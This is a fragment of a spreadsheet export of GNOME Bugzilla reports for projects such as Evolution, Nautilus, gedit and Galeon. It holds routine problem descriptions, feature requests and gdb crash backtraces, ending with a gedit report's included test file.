  File /usr/lib/python2.5/site-packages/deskbar/core/CoreImpl.py line 65 in _setup_keybinder
    self.set_keybinding( DEFAULT_KEYBINDING )
NameError: global name 'DEFAULT_KEYBINDING' is not defined</t>
  </si>
  <si>
    <t>brumela</t>
  </si>
  <si>
    <t>EVOLUTION-219921</t>
  </si>
  <si>
    <t>actions (reply forward etc.) inactive when they shouldn't be</t>
  </si>
  <si>
    <t>Description of Problem:
After some period of time (haven't figured it if there's a pattern) the
reply reply all and forward buttons on the toolbar become inactive
even when they shouldn't be.  Even with a message selected these buttons
are grayed out and inaccessible.  You can still use other mechanisms to get
to the functionality (i.e. right-click or use the menu) but they're
cumbersome.  Note that the keyboard shortcuts for these features also
appear to be inactive so there's no efficient mechanism left for
performing these features.  Restarting evolution fixes the problem
temporarily.
Steps to reproduce the problem:
1.  Run evolution.
2.  Wait.
3. 
Actual Results:
Reply Reply All Forward are grayed out and unavailable permanently.
Expected Results:
Reply Reply All and Forward should be available as appropriate (i.e. when
you've got a message selected).
How often does this happen? 
It's happened twice since I upgraded to 1.0.2.
Additional Information:</t>
  </si>
  <si>
    <t>klassa</t>
  </si>
  <si>
    <t>GNOME-MEDIA-33615</t>
  </si>
  <si>
    <t xml:space="preserve">Package: general
Severity: normal
Version: 
&gt;Synopsis: 
&gt;Class: sw-bug
Distribution: Red Hat Linux release 6.2 (Zoot)
System: Linux 2.2.14-5.0 i586 unknown
C library: glibc-2.1.3-15
C compiler: egcs-2.91.66
glib: 1.2.6
GTK+: 1.2.6
ORBit: ORBit 0.5.0
gnome-libs: gnome-libs 1.0.55
gnome-core: gnome-core-1.0.55-12
Debugging information:
(no debugging symbols found)...Core was generated by `vumeter'.
Program terminated with signal 6 Aborte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  0x403e6d41 in __kill () from /lib/libc.so.6
#0  0x403e6d41 in __kill () from /lib/libc.so.6
#1  0x403e69b6 in raise (sig=6) at ../sysdeps/posix/raise.c:27
#2  0x403e80d8 in abort () at ../sysdeps/generic/abort.c:88
#3  0x403b3833 in g_logv () from /usr/lib/libglib-1.2.so.0
#4  0x403b38f6 in g_log () from /usr/lib/libglib-1.2.so.0
#5  0x804b271 in itoa ()
#6  0x4005fcd5 in gnome_dialog_marshal_signal_2 ()
   from /usr/lib/libgnomeui.so.32
#7  0x401f35fd in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
#8  0x401f2a42 in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#9  0x401f0b95 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#10 0x400617ef in gnome_dialog_close () from /usr/lib/libgnomeui.so.32
#11 0x40061460 in gnome_dialog_button_clicked () from /usr/lib/libgnomeui.so.32
#12 0x401c5efd in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#13 0x401f35fd in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
#14 0x401f2b7e in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#15 0x401f0b95 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#16 0x401658c8 in gtk_button_clicked () from /usr/lib/libgtk-1.2.so.0
#17 0x40166eb8 in gtk_real_button_released () from /usr/lib/libgtk-1.2.so.0
#18 0x401c5efd in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#19 0x401f28fb in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#20 0x401f0b95 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#21 0x40165808 in gtk_button_released () from /usr/lib/libgtk-1.2.so.0
#22 0x40166872 in gtk_button_button_release () from /usr/lib/libgtk-1.2.so.0
#23 0x401c5ac9 in gtk_marshal_BOOL__POINTER () from /usr/lib/libgtk-1.2.so.0
#24 0x401f2a7b in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#25 0x401f0b95 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#26 0x40225a3c in gtk_widget_event () from /usr/lib/libgtk-1.2.so.0
#27 0x401c5a22 in gtk_propagate_event () from /usr/lib/libgtk-1.2.so.0
#28 0x401c4c7a in gtk_main_do_event () from /usr/lib/libgtk-1.2.so.0
#29 0x4026f4db in gdk_event_dispatch () from /usr/lib/libgdk-1.2.so.0
#30 0x403b1186 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#31 0x403b1751 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#32 0x403b18f1 in g_main_run () from /usr/lib/libglib-1.2.so.0
#33 0x401c45b9 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#34 0x804ba25 in main ()
#35 0x403e09cb in __libc_start_main (main=0x804b600  argc=1 
    argv=0xbffffa44 init=0x80499c0  fini=0x804ba9c  
    rtld_fini=0x4000ae60  stack_end=0xbffffa3c)
    at ../sysdeps/generic/libc-start.c:92
#0  0x403e6d41 in __kill () from /lib/libc.so.6
No locals.
#1  0x403e69b6 in raise (sig=6) at ../sysdeps/posix/raise.c:27
No locals.
#2  0x403e80d8 in abort () at ../sysdeps/generic/abort.c:88
act = {__sigaction_handler = {sa_handler = 0x403c2dac 
    sa_sigaction = 0x403c2dac} sa_mask = {__val = {0 2 1077542912 
      1077551720 1077685788 1077561025 1077730992 3221218864 1073785200 
      1077623040 0 1078389504 1077542912 1077685676 3221218856 
      1073784829 1077149384 1078805440 7 1073784654 1077685676 0 6 
      1077542912 1077553976 1077686024 1077563128 1077728704 3221219956 
      1073785200 13 1077674578}} sa_flags = 1077837840 
  sa_restorer = 0x403a0000}
sigs = {__val = {32 0 }}
#3  0x403b3833 in g_logv () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#4  0x403b38f6 in g_log () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#5  0x804b271 in itoa ()
No symbol table info available.
#6  0x4005fcd5 in gnome_dialog_marshal_signal_2 ()
   from /usr/lib/libgnomeui.so.32
No symbol table info available.
#7  0x401f35fd in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-28 11:30 -------
This bug was previously known as bug 33615 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=33615
Originally filed under the gnome-media product and general component.
The original reporter (marceloantosouza@zipmail.com.br) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component unknown@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>marceloantosouza</t>
  </si>
  <si>
    <t>GNOME-VFS-500307</t>
  </si>
  <si>
    <t>uninitialized GnomeVFSFileInfo struct in do_seek()</t>
  </si>
  <si>
    <t>Please describe the problem:
GnomeVFSFileInfo file_info is used uninitialized in do_seek() which causes a crash of the mail-notification program when defining a mailbox over ssh.
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>GNOME-KEYRING-MANAGER-148179</t>
  </si>
  <si>
    <t>Secret not displayed after deletion of item in keyring editor</t>
  </si>
  <si>
    <t>-select an item in the keyring editor's tree view
-expand the show secret expander
-delete the selected item
A new item is now selected (provided there was more than one item in the
keyring) but its secret is not displayed in the secret field.</t>
  </si>
  <si>
    <t>bowes</t>
  </si>
  <si>
    <t>LSR-386316</t>
  </si>
  <si>
    <t>RGB constrast settings for magnifiers saturate early</t>
  </si>
  <si>
    <t>The RGB contrast sliders for the magnifier range from 0.0 to 50.0. However they seem to saturate completely at 2.0. Nothing about 2.0 has any visual effect. This likely means the conversion is incorrect.
On an unrelated note can the magnifier accept negative values for these settings? If so the settings need to account.</t>
  </si>
  <si>
    <t>NAUTILUS-97887</t>
  </si>
  <si>
    <t>Change mouse pointer when loading views</t>
  </si>
  <si>
    <t>It would be nice if nautilus changed the mouse pointer when loading folders
(especially for us who do not use the toolbar).
I had in mind the mouse pointer mozilla uses when loading web pages
(pointer + watch). This pointer will give visual indication that work is
being done however will not block the users interaction with the loading
folder or with the window.</t>
  </si>
  <si>
    <t>NAUTILUS-47343</t>
  </si>
  <si>
    <t>Fonts checks should work even when nautilus has not undergone 'make install'</t>
  </si>
  <si>
    <t xml:space="preserve">The issue is that there will have not been a font installed if nautilus did not
undergo 'make install'
We currently work around thi by hard coding the location of a font that is very
likely (but not 100% likely) to be found on the system.
Ideally we would use the fallback font nautilus installs and if that is not
found use the one in the source tree itself.
------- Additional Comments From ramiro@fateware.com 2001-03-05 08:27:42 ----
*** Bug 47368 has been marked as a duplicate of this bug. ***
------- Additional Comments From eli@eazel.com 2001-03-26 11:20:11 ----
SPAAAAAAAAAM! 
(Jon Allen has taken these components QA Assigning bugs to him.)
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 21:06 -------
</t>
  </si>
  <si>
    <t>GNOME-SETTINGS-DAEMON-644571</t>
  </si>
  <si>
    <t>critical assertion due to wrong variant type</t>
  </si>
  <si>
    <t>Created attachment 183217
patch
gnome-settings-daemon emits a critical assertion on startup:
(gnome-settings-daemon:6205): GLib-CRITICAL **: the GVariant format string `(u)' has a type of `(u)' but the given value has a type of `u'
Patch attached.</t>
  </si>
  <si>
    <t>DIA-129221</t>
  </si>
  <si>
    <t>pressing Control-Z sometimes causes crash</t>
  </si>
  <si>
    <t>while editing a diagram I press Control-Z to undo an action.  Usually this
works as expected but occasionally it causes the application to
crash--completely disappear losing all changes.  I have played with a test
file but cannot reproduce this.</t>
  </si>
  <si>
    <t>terry</t>
  </si>
  <si>
    <t>LIBGDA-482366</t>
  </si>
  <si>
    <t>LDAP provider</t>
  </si>
  <si>
    <t>gdadatamodel for ldap</t>
  </si>
  <si>
    <t>Please describe the problem:
re write the code
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>arawaco</t>
  </si>
  <si>
    <t>EVOLUTION-431497</t>
  </si>
  <si>
    <t>offline mode should disable loading of images from the internet</t>
  </si>
  <si>
    <t>If offline mode isolated Evolution from the net as its icom suggests it does then one could conveniently inspect possible spam email without alerting the spammer.  More convenient than changing a preference.  I can't find another use for offline mode!</t>
  </si>
  <si>
    <t>davidbrightly</t>
  </si>
  <si>
    <t>METACITY-504998</t>
  </si>
  <si>
    <t>Theme glitch with compositor</t>
  </si>
  <si>
    <t>I just tried to use Metacity with ian compositor enabled (from ubuntu hardy) and when my gnome-terminal was in background the window title became transparent.
it seems to happen only why the terminal so far.
I use the Darkilouche theme (dark version of Gilouche) the only difference I can see is I have no window decoration in the theme preview in the apparence capplet (screenshot attached)</t>
  </si>
  <si>
    <t>GNOME-APPLETS-340766</t>
  </si>
  <si>
    <t>all notes can be deleted under certain circumstances</t>
  </si>
  <si>
    <t>Please describe the problem:
On two occasions after a system crash I have found all of my notes to be gone.
Investigating with strace it appears that the ~/.gnome2/stickynotes_applet file
is written over without using the safe-save method (write to backup then
rename).  If this method were used data loss would be less likely. 
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:
ubuntu dapper beta</t>
  </si>
  <si>
    <t>ergosys</t>
  </si>
  <si>
    <t>GLIB-156621</t>
  </si>
  <si>
    <t>new macros are used in gutils.c.</t>
  </si>
  <si>
    <t>Please describe the problem:
CSIDL_PROFILE CSIDL_COMMON_APPDATA and CSIDL_COMMON_DOCUMENTS are new macro.
Those are not in header (shlobj.h) of old SDK.
If I use new SDK this problem is solved.
But other problem occurs in new SDK.
(http://bugzilla.gnome.org/show_bug.cgi?id=155884)
Should I use SDK what was released when?
Steps to reproduce:
1. compile by Visual C++ 6.0
Actual results:
an error occurs. (http://msdn.microsoft.com/library/ en-us/vccore98/html/c2065.asp)
Expected results:
I want you to decide the version of SDK which we should use.
Does this happen every time?
every time
Other information:</t>
  </si>
  <si>
    <t>SNOWY-645471</t>
  </si>
  <si>
    <t>Add Leon and Jeff as maintainers to snowy.doap and MAINTAINERS file</t>
  </si>
  <si>
    <t>Need Jeff and Leon to have release powers etc.
If you guys could let me know your GNOME user IDs (what you use to log in to GNOME servers) I'll go ahead and update the files.</t>
  </si>
  <si>
    <t>GENERAL-348045</t>
  </si>
  <si>
    <t>META: Update to UCD 5.0</t>
  </si>
  <si>
    <t>Tracker bug for updates to Unicode Character Database 5.0 released on July 18 2006.</t>
  </si>
  <si>
    <t>DOXYGEN-149023</t>
  </si>
  <si>
    <t>Class diagram and template inheritance problem (id 147425 continue)</t>
  </si>
  <si>
    <t>class Array { public: Array() }
    template class SArray : public Array { public: SArray() }
    template class DArray : public SArray { public: DArray() }
    typedef DArray ByteArray
    typedef DArray U32Array  
    class Str1 : public U32Array { public: Str1() }
    //class Str2 : public DArray  { public: Str2() }
    // doxygen.cfg TEMPLATE_RELATIONS     = YES
In the class diagram Str1-DArray relation is showed and not
Str1-DArray (but DArray is showed in the Array's
hiearchy).
The problem is identical with the closed 147425 bug.</t>
  </si>
  <si>
    <t>GNOME-USER-SHARE-163652</t>
  </si>
  <si>
    <t>Use a translator comment explaining how to avoid genitive in gnome-user-share schemas message</t>
  </si>
  <si>
    <t>#: user_share.c:148
# c-format
msgid %s's public files
Genitives written this way are difficult to translate into other languages.
First of all many languages don't have the Saxon genitive but use other forms
(the public files of %s) so it may be difficult to get this right for
translators. See topic 13 at
http://developer.gnome.org/documents/style-guide/locale-5.html.
Second even for languages that use the Saxon genitive this design may cause
problems as the form of the genitive may depend on the word inserted at the %s.
For example you would have this in Swedish:
Owner      Correct genitive          *Incorrect* genitive
------------------------------------------------------------
Tom        Toms publika filer
Christian  Christians publika filer
Andreas    Andreas publika filer     Andreass publika filer
Markus     Markus publika filer      Markuss publika filer
Niklas     Niklas publika filer      Niklass publika filer
Alex       Alex publika filer        Alexs publika filer
As you can see the standard form for a Swedish genitive is to simply add an s
at the end (no apostrophes). However if the name of the owner already ends in
an s-like sound no s should be added.
Naturally this is difficult to accomplish with an %ss publika filer design
as you would get the incorrect forms listed above unless you add some special
logic to determine if the name ends in an s-like sound. Even then this would
probably only work for some languages and not others.
The best way to avoid all this is to avoid Saxon genitives and instead use the
... of %s style.
However if this is undesired please at least add a translator comment
explaining how to avoid the genitive alltogether. This example comment is based
on the one suggested in bug 45360:
/* Translators: The %s will get filled in with the user name
   of the user to form a genitive. If this is difficult to
   translate correctly so that it will work correctly in your
   language you may use something equivalent to
   Public files of %s or leave out the %s altogether.
   In the latter case please put %.0s somewhere in the string
   which will match the user name string passed by the C code
   but not put the user name in the final string. This is to
   avoid the warning that msgfmt might otherwise generate. */</t>
  </si>
  <si>
    <t>GALEON-135108</t>
  </si>
  <si>
    <t>crash when closing tab with dirty pop-up</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Debian testing/unstable
Package: galeon
Severity: normal
Version: GNOME2.4.1 unspecified
Gnome-Distributor: Debian
Synopsis: crash when closing tab with dirty pop-up
Bugzilla-Product: galeon
Bugzilla-Component: general
Bugzilla-Version: unspecified
BugBuddy-GnomeVersion: 2.0 (2.4.0.1)
Description:
Description of the crash:
Galeon crashed when I tried to close a tab that opened automatically
(javascript popup on a website).
Steps to reproduce the crash:
1. go to http://www.meyerweb.com/eric/css/edge/menus/demo.html
2. go to the bottom and middle-click on Inigo's (the link between
brackets).
3. Inigo's webpage opens in a tab in the background
(http://inigo.0catch.com/menu/index.html)
4. Inigo's webpage randomly opens some popups which galeon opens in
tabs
5. closing some of these popup-tabs makes galeon crash (also after
restarting with crashed session)
Expected Results:
Uhm... Galeon not to crash.
How often does this happen?
Every time with certain popups.
Additional Information:
Will attach saved crash-session which can be used to trigger the
crash.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2004-02-22 01:18 -------
Reassigning to the default owner of the component galeon-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>wouter-gnome</t>
  </si>
  <si>
    <t>GNOME-PHONE-MANAGER-455095</t>
  </si>
  <si>
    <t>Export battery info to gnome-power-manager</t>
  </si>
  <si>
    <t>Exported D-Bus API:
i GetNumberBatteries()
i (percentage) b (on_ac) GetBatteryState(i)
signal(BatteryStateChanged)
signal(NumberBatteriesChanged)</t>
  </si>
  <si>
    <t>NAUTILUS-169538</t>
  </si>
  <si>
    <t>Deleting files with Delete does sometimes not work</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Debian 3.1
Package: nautilus
Severity: normal
Version: GNOME2.8.1 unspecified
Gnome-Distributor: Debian
Synopsis: Deleting files with Delete does sometimes not work
Bugzilla-Product: nautilus
Bugzilla-Component: File and Folder Operations
Bugzilla-Version: unspecified
Description:
Description of Problem:
I'm cleaning up my home directory using Nautilus in browse mode. In my
directory I have files and folder I'd like to delete while using the
icon view in Nautilus. Sometimes when I hit the delete key nothing
happens even though the item is selected I have to hit the delete key
twice. I can also select the item twice with the mouse first which also
works. 
Steps to reproduce the problem:
1. Select one item with the mouse
2. Hit Delete
3. Select another item (file or folder)
4. Hit Delete
Actual Results:
Item is sometimes deleted
Expected Results:
Item is always deleted
How often does this happen?
About 60-70% of the times.
Additional Information:
------- Bug moved to this database by unknown@bugzilla.gnome.org 2005-03-07 18:26 -------
Unknown platform unknown. Setting to default platform Other.
Unknown milestone unknown in product nautilus.
   Setting to default milestone for this product '---'
Setting to default status UNCONFIRMED.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>daniel.n.nilsson</t>
  </si>
  <si>
    <t>YELP-128383</t>
  </si>
  <si>
    <t>yelp segfaults at startup</t>
  </si>
  <si>
    <t>EVOLUTION-203486</t>
  </si>
  <si>
    <t>seg fault after odd behaviour in filter dialog</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Major
Version: 0.10.99
Synopsis: seg fault after odd behaviour in filter dialog
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
I tried to add a filter on mailing list.
Hit choose folder selected a folder clicked ok
Noticed filter dialog still thought I needed to select one. 
Tried to re-select but Folder selection dialog never came up
Exited evolution got segfault
Debugging Information:
(no debugging symbols found)...[New Thread 1024 (LWP 1453)]
[New Thread 2049 (LWP 1465)]
[New Thread 1026 (LWP 1466)]
[New Thread 2051 (LWP 1469)]
[New Thread 3076 (LWP 1470)]
[New Thread 4101 (LWP 1471)]
[New Thread 15366 (LWP 2203)]
0x409b6519 in __wait4 ()
   from /lib/i686/libc.so.6
#0  0x409b6519 in __wait4 () from /lib/i686/libc.so.6
#1  0x40a269e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x406a4563 in waitpid (pid=2204 stat_loc=0xbfffe8ac options=0)
    at wrapsyscall.c:172
#3  0x402d2262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x0808b3de in message_browser_get_type () at eval.c:41
#5  0x406a2935 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 141133336 esi = 142574984 ebp = 3221220496 esp = 3221220472 ebx = 1084385764 edx = 793986375 ecx = 140316496 eax = 0 trapno = 14 err = 4 eip = 1083686112 cs = 35 __csh = 0 eflags = 2163206 esp_at_signal = 3221220472 ss = 43 __ssh = 0 fpstate = 0xbfffe9f8 oldmask = 2147483648 cr2 = 793986371}) at signals.c:97
#6  
#7  __libc_free (mem=0x2f534547) at malloc.c:3036
#8  0x405651f1 in g_free (mem=0x2f534547) at gmem.c:411
#9  0x080b5942 in filter_folder_new () at eval.c:41
#10 0x4047ae4b in gtk_marshal_NONE__NONE (object=0x8698618 
    func=0x80b589c  func_data=0x87f8588 
    args=0xbfffede8) at gtkmarshal.c:312
#11 0x404aa56a in gtk_handlers_run (handlers=0x8905438 signal=0xbfffed88 
    object=0x8698618 params=0xbfffede8 after=0) at gtksignal.c:1917
#12 0x404a99bb in gtk_signal_real_emit (object=0x8698618 signal_id=179 
    params=0xbfffede8) at gtksignal.c:1477
#13 0x404a7a30 in gtk_signal_emit (object=0x8698618 signal_id=179)
    at gtksignal.c:552
#14 0x4041858c in gtk_button_clicked (button=0x8698618) at gtkbutton.c:336
#15 0x40419b02 in gtk_real_button_released (button=0x8698618)
    at gtkbutton.c:861
#16 0x4047ae4b in gtk_marshal_NONE__NONE (object=0x8698618 
    func=0x40419a5c  func_data=0x0 args=0xbffff178)
    at gtkmarshal.c:312
#17 0x404a9867 in gtk_signal_real_emit (object=0x8698618 signal_id=178 
    params=0xbffff178) at gtksignal.c:1440
#18 0x404a7a30 in gtk_signal_emit (object=0x8698618 signal_id=178)
    at gtksignal.c:552
#19 0x404184d0 in gtk_button_released (button=0x8698618) at gtkbutton.c:327
#20 0x40419477 in gtk_button_button_release (widget=0x8698618 event=0x82f99a8)
    at gtkbutton.c:721
#21 0x4047ac21 in gtk_marshal_BOOL__POINTER (object=0x8698618 
    func=0x404193b4  func_data=0x0 
    args=0xbffff518) at gtkmarshal.c:28
#22 0x404a99fb in gtk_signal_real_emit (object=0x8698618 signal_id=33 
    params=0xbffff518) at gtksignal.c:1492
#23 0x404a7a30 in gtk_signal_emit (object=0x8698618 signal_id=33)
    at gtksignal.c:552
#24 0x404deee8 in gtk_widget_event (widget=0x8698618 event=0x82f99a8)
    at gtkwidget.c:2864
#25 0x4047ab98 in gtk_propagate_event (widget=0x8698618 event=0x82f99a8)
    at gtkmain.c:1378
#26 0x40479d55 in gtk_main_do_event (event=0x82f99a8) at gtkmain.c:818
#27 0x4053416b in gdk_event_dispatch (source_data=0x0 
    current_time=0xbffff8e8 user_data=0x0) at gdkevents.c:2139
#28 0x40564055 in g_main_dispatch (dispatch_time=0xbffff8e8) at gmain.c:656
#29 0x40564659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#30 0x405647e8 in g_main_run (loop=0x80dd9a8) at gmain.c:935
#31 0x4047965b in gtk_main () at gtkmain.c:524
#32 0x407cd4bf in bonobo_main () at bonobo-main.c:277
#33 0x0808b569 in main () at eval.c:41
#34 0x40918177 in __libc_start_main (main=0x808b408  argc=3 
    ubp_av=0xbffffb0c init=0x8061da8  fini=0x80b8bac  
    rtld_fini=0x4000e184  stack_end=0xbffffb04)
    at ../sysdeps/generic/libc-start.c:129
#0  0x409b6519 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x40a269e4 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x406a4563 in waitpid (pid=2204 stat_loc=0xbfffe8ac options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbfffe8ac
options = 0
result = 0
oldtype = 0
#3  0x402d2262 in gnome_segv_handle (signum=11) at gnome-init.c:659
	in gnome-init.c
estatus = 1084379920
in_segv = 1
pid = 0
#4  0x0808b3de in message_browser_get_type () at eval.c:41
	in eval.c
ap = (void **) 0xbfffe96c
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0xbfffe9f8 \177\003Ã¿Ã¿ \001Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿|\021V@#
result = 3221219692
result = 3221219832
#5  0x406a2935 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 141133336 esi = 142574984 ebp = 3221220496 esp = 3221220472 ebx = 1084385764 edx = 793986375 ecx = 140316496 eax = 0 trapno = 14 err = 4 eip = 1083686112 cs = 35 __csh = 0 eflags = 2163206 esp_at_signal = 3221220472 ss = 43 __ssh = 0 fpstate = 0xbfffe9f8 oldmask = 2147483648 cr2 = 793986371}) at signals.c:97
	in signals.c
signo = 0
__value = 0xfffffe00 
#6  
No locals.
#7  __libc_free (mem=0x2f534547) at malloc.c:3036
	in malloc.c
mem = (void *) 0x0
ar_ptr = (arena *) 0x8698618
p = 0x87f8588
Reassigning to the default owner of the component evolution-mail-maintainers@ximian.com.
</t>
  </si>
  <si>
    <t>EPIPHANY-415074</t>
  </si>
  <si>
    <t>Find result is obscured by Find bar after cancelling search followed by Find Next</t>
  </si>
  <si>
    <t>Copy + Paste from irc:
 I just got a bug report on IM which is reproducable in 2.16. Go to http://archives.mandrivalinux.com/changelog/2007-02/index.php type '/sudo' triggering the find bar cancel search press Ctrl+G =&gt; next match is obscured by the findbar
 I don't think that's in bugzilla yet afaics
 yes I see that all the time with find (using ff 2.0 backend)
 chpe: want a bug filed?
 reinouts: sure but I have no idea how to fix it.... need to scroll the window so the link is visible after showing the findbar but...
 chpe: the scrolling is responsibility of gecko?
 reinouts: yes I think the find code positions the page so it's visible but it cannot know that we're going to resize the embed right afterward...</t>
  </si>
  <si>
    <t>GEDIT-57800</t>
  </si>
  <si>
    <t>Crash on file load</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gedit
Severity: normal
Version:  0.9.0
Synopsis: Crash on file load
Class:    sw-bug
System: Linux 2.2.16-22 i686 unknown
C library: glibc-2.2-12
C compiler: 2.96
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.3
gnome-libs: gnome-libs 1.2.4
libxml: 1.8.9
gnome-print: gnome-print-0.20
gnome-core: gnome-core 1.2.1
Description:
Program crashes when invoked from GNU Midnight Commander 4.5.51 to
display a file containing non printable (FS ETX US) ASCII characters.
Program works correctly if the file is opened with File|Open when the
program is ran by some other means (i.e. from terminal or Gnome menu).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x405a8869 in __wait4 () from /lib/libc.so.6
#0  0x405a8869 in __wait4 () from /lib/libc.so.6
#1  0x406141c8 in __DTOR_END__ () from /lib/libc.so.6
#2  0x40096b38 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  
#4  chunk_alloc (ar_ptr=0x40612680 nb=33) at malloc.c:2832
#5  0x40570cb2 in __libc_malloc (bytes=24) at malloc.c:2714
#6  0x40412baa in g_malloc () from /usr/lib/libglib-1.2.so.0
#7  0x4041b91a in g_strdup_vprintf () from /usr/lib/libglib-1.2.so.0
#8  0x4041b95f in g_strdup_printf () from /usr/lib/libglib-1.2.so.0
#9  0x8050932 in gedit_document_set_title ()
#10 0x805103a in gedit_file_open ()
#11 0x805006a in gedit_document_new_with_file ()
#12 0x8050817 in gedit_document_load ()
#13 0x8052992 in main ()
#14 0x40513b5c in __libc_start_main (main=0x80528e0  argc=2 
    ubp_av=0xbffffa14 init=0x804df8c  fini=0x805e66c  
    rtld_fini=0x4000d634  stack_end=0xbffffa0c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x405a8869 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x406141c8 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x40096b38 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  
No locals.
#4  chunk_alloc (ar_ptr=0x40612680 nb=33) at malloc.c:2832
victim = 0x810afd0
victim_size = 1162627392
idx = 6
bin = 0xfffffe00
remainder = 0x40612680
remainder_size = -1073744272
remainder_index = -1073744272
block = 16
startidx = 135311344
fwd = 0x0
bck = 0x810aff0
q = 0x0
victim = 0x810afd0
victim_size = 1162627392
idx = 6
bin = 0xfffffe00
remainder = 0x40612680
remainder_size = -1073744272
remainder_index = -1073744272
block = 16
startidx = 135311344
fwd = 0x0
bck = 0x810aff0
q = 0x0
#5  0x40570cb2 in __libc_malloc (bytes=24) at malloc.c:2714
2714	in malloc.c
bytes = 0
ar_ptr = (arena *) 0x40612680
nb = 32
victim = 0x40612680
result = (void *) 0xfffffe00
ar_ptr = (arena *) 0x40612680
nb = 32
victim = 0x40612680
vptr = (void *) 0x40612680
vptr = (void *) 0x40612680
#6  0x40412baa in g_malloc () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#7  0x4041b91a in g_strdup_vprintf () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
--- Included file ---
100290537-1122HTTP SMS SERVER11%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%23%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%24%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%25%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%26%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%100%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%200%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%27%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%38%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%101%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%201%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%28%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%39%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%102%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%202%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%29%%MOBILENUMBER%%This is a test for %%MOBIL!
ENUMBER%%40%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%103%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%203%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%30%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%41%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%104%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%204%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%31%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%42%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%105%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%205%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%32%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%43%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%106%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%206%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%33%%MOBILENUMBER%%This is a test for %%MOBILENUMBER%%44%%MO!
